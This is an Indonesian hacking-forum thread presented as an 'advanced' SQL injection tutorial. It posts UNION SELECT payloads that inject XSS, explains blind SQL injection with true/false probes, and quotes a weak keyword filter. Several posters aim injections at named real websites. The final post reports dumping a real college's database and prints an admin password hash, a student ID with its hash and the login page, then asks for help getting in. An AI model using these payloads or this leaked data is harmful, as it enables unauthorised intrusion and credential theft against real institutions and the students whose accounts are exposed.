[Tutorial] Advance SQL Injection

[Neo-Gabriel]

Nambahin dikit yah kak Satya :love:
XFS (XSS on SQLinjection)
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,char(ASCII_CODE),4,5--
ex:
alert: <script>alert('gabriel')</script>
ASCII: 60 115 99 114 105 112 116 62 97 108 101 114 116 40 39 103 97 98 114 105 101 108 39 41 60 47 115 99 114 105 112 116 62

POC:
http://www.victim.gov/agent_detail.php?aid=-9 union all select 1,2,char(60,115,99,114,105,112,116,62,97,108,101,114,116,40,39,103,97,98,114,105,101,108,39,41,60,47,115,99,114,105,),4,5--

sorry I'm still n00b :mati:

[^Nd3s0^]

mantap master satya.....
coba dulu ah....

[shinichi81]

ikut nambahin bos...........

http://www.chrysantflorist.com/?module= ... 11,12,13--

wat belajar..........

[p4njul^th3^3xpl0r3r]

Mhn maap neh Om, bukannya gak menghargai hasil karyax, perasaan yg dibahas itu malah Basic SQL Injection dueh... :putusasa:
Maap2x kate neh ya Om, soalnya teknik yg dipaparkan sdh umum di pasaran... :maaf:
Menurut pemahaman sy sebagai org awam, yg namanya Advance Technique dapat memecahkan permasalahan yg sangat sulit, yg tdk dapat diselesaikan dgn teknik SQLi biasa.
Sebagai contoh, SQLi pada MySQL Ver.4, Blind SQLi dan bbrp lg yg lain.
Oh ya, bkn bermaksud mo sok yah Om, kebanyakan dari kita ini cmn make ilmu yg instan2 aje :putusasa:
Cmn tau doank tp kagak paham ujung pangkalnya :putusasa:
Neh sy kasih sebuah pertanyaan, klo jawaban Anda dapat memuaskan sy bakal sy kasih 4 jempol deh dan sy akui Anda sdh sampe pd tahap Advance pengetahuannya ttg SQLi.

Jelaskan penyebab terjadinya Blind SQLi ?

[shinichi81]

sebelum ngejawab pertanyaan itu paling kita tengok dulu Perbedaan SQLinjection dan Blind SQL injection :

SQLinjection adalah metode hacking yang memungkinkan seorang Hacker mengakses isi dari database server Smile
seorang attacker biasanya melakukan pentest dengan memberikan masukan agar database server memberikan SQL query yang tidak valid (error), dengan munculnya pesan error si attacker akan mempelajari pesan error tersebut sehingga mendapatkan inforamsi2 yang lebih untuk melakukan tahapan pentest berikutnya, jika sebuah web tidak menimbulkan pesan error bukan berarti web tersebut bebas dari vuln SQL iinjection, tetapi masih mungkin terkena Blind SQL injection

mendeteksi Blind SQL injection
sudah pasti sebuah aplikasi web menggunakan SQL query untuk mengambil data dari database server, dan biasanya menggunaka kalusa WHERE pada bagian-bagian tertentu

http://www.korban.com/berita.php?id_berita=5

pernyataan SQL di atas kurang lebih begini

SELECT judul, diskripsi, berita, keterangan FROM berita WHERE id_berita = 5

dalam keadaan normal maka server akan mengirmkan kembali hasil pengambilan data dari server tanpa error, untuk menetukan apakah itu vuln terhadap Blind SQLinjection attacker akan melakukan injection pada kalusa WHERE misalnya

http://www.korban.com/berita.php?id_berita=5 AND 1=1

maka database server akan melakukan perintah

SELECT judul, diskripsi, berita, keterangan FROM berita WHERE id_berita = 5 AND 1=1

jika tidak ada pesan error atau tampilan web persis seperti semula maka masih mungkin terkena Blin SQL injection Smile , karena jika tu web aman maka seharusnya perintah SQL itu ndak di jalanin, kemudian si attacker akan menguji untuk memastikan vuln terhadap Blind SQL injection apa tidak dengan memberikan perintah SQL berupa keadaan false Smile

http://www.korban.com/berita.php?id_berita=5 AND 1=2

maka database server akan mengeksekusi perintah

SELECT judul, diskripsi, berita, keterangan FROM berita WHERE id_berita = 5 AND 1=2

ini akan menyebab error tipe karena pada dasarnya memang 1 tidak sama dengan 2 Smile dan pada halaman web tidak akan di tampilkan berita yang dicari alias halama kosong tetapi tidak ada pesan error yang muncul :love: untuk exploitasi selanjutnya ya tidak jauh berbeda dengan SQL injection standar hanya awalnya saja yang berbeda. :love: kemungkinan pembuat website-nya lebih mengutamakan security-nya

semoga membantu ya :kaca: :kaca: :kaca:

[p4njul^th3^3xpl0r3r]

tidak ada pesan error yang muncul

Maaf Om, mgkn lebih tepatnya, hasil query pada saat melakukan SQLi tidak dimunculkan, dan sebenarnya ciri2 Vuln SQLi baik pada SQLi biasa dan Blind SQLi itu sama kayaknya, yg membedakan keduanya pada saat akan memunculkan hasil query, please CMIIW...

Ref:
http://en.wikipedia.org/wiki/SQL_inject ... _injection

Ok, sampe di penjelasan itu sy paham, itulah yg membedakan antara SQLi Biasa dan Blind SQLi, dimana pada Blind SQLi hasil query tdk dimunculkan, sehingga satu2nya cara hanya membandingkan data yg kita masukkan dgn data yg ada pada database. jika hasilnya TRUE, berarti data yg kita masukkan ada pada database, demikian sebaliknya.

Tp pertanyaan inti sy blom terjawab Om, Apa yg menyebabkan sehingga hasil Query tidak dimunculkan, sehingga perlu menggunakan teknik Blind SQLi...???

[shinichi81]

aku cobain wat jelasinn dulu bos,moga aja berkenan penjelasannya :

Blind SQL Injection adalah salah satu tehnik exploitasi database yang berbeda
dengan sql injection biasa dimana pada sql injection biasa akan mengeluarkan sebuah
value akan tetapi pada tehnik blind sql injection tidak akan mengeluarkan value
apapun akan tetapi kita akan mengetahui value tersebut dengan trial and error akan
value tersebut / menguji true atau falsenya value tersebut,jadi secara kasarnya kalau blind SQL posisi :
statement := “SELECT * FROM users WHERE name = ‘” + userName + “‘;” ---> posisi statment disamarkan sehingga kita tidak bisa mengetahui apakah terjadi kesalahan atau tidak,sehingga hanya memunculkan website yang blank saja....

So,apa yang menyebabkan terjadinya Blind Sql cuman satu jawabannya kalau menurut ane....posisi websitenya tetap menunjukan posisi error dengan cara seperti menunjukan posisi website yang blank atau tidak ada gambar sama sekali,tetapi posisi Query atau statmen yang menunjukan posisi error dipindahkan ke halaman website yang lain

maksudnya,ketika kita mencoba melakukan Inject ke web tersebut untuk memcari vuln dengan tanda ' atau - posisi web tidak menunjukan kesalahan error apapun...tetapi ketika kita mengetikan Query -->
[site]/index.php?id=2AND+1=1 dll ...baru bisa terjawab



Bos,maap bahasanya masih rancu soalnya ane masih cupu :devil :devil :devil :devil

[3xtr3m3b0y]

Apa yg menyebabkan sehingga hasil Query tidak dimunculkan, sehingga perlu menggunakan teknik Blind SQLi...???

Mgkn salah satu penyebabnya karena melakukan Filter SQLi yg kurang tepat, ex:

Code: Select all

if (preg_match("/union select/", $id) or preg_match("/union all select/",$id)){echo "Awas ada yg pengen nginjek Omz...!"; exit;}

Mhn teman XCoder yg lain bisa menambahkan...

[shinichi81]

asikk bertambah lagi nih ilmunya.....ayo siapa lagi yang mau share :love: :love: :love:

[peniru]

nambah atu...

URL:http://www.stmikpontianak.ac.id/news.ph ... ,6,7,8,9--
[+] Gathering MySQL Server Configuration...
Database: stmik
User: stmik@localhost
Version: 4.1.22
[+] Dumping data from database "stmik" Table "password"
[+] Column(s) ['user', 'password', 'id']
[+] Number of Rows: 8
salah satu hasilna...

ADMKETUA:"4c28d6c562063fd5" <-- sayang ane gag taw ni di encrypt pake algo apa yah..... :mati: :mati:

tabel penting lainnya...
[+] Dumping data from database "stmik" Table "login"
[+] Column(s) ['nim', 'password']
[+] Number of Rows: 1486
salah satu hasilnya...

[1] 19941000575:ce9e7830bf9827340bcceaaf3e8e183a <-- berhasil di encrypt but dak bisa login... :mati: :mati:

login page :

Code: Select all

http://www.stmikpontianak.ac.id/user.login.php

mohon pencerahannya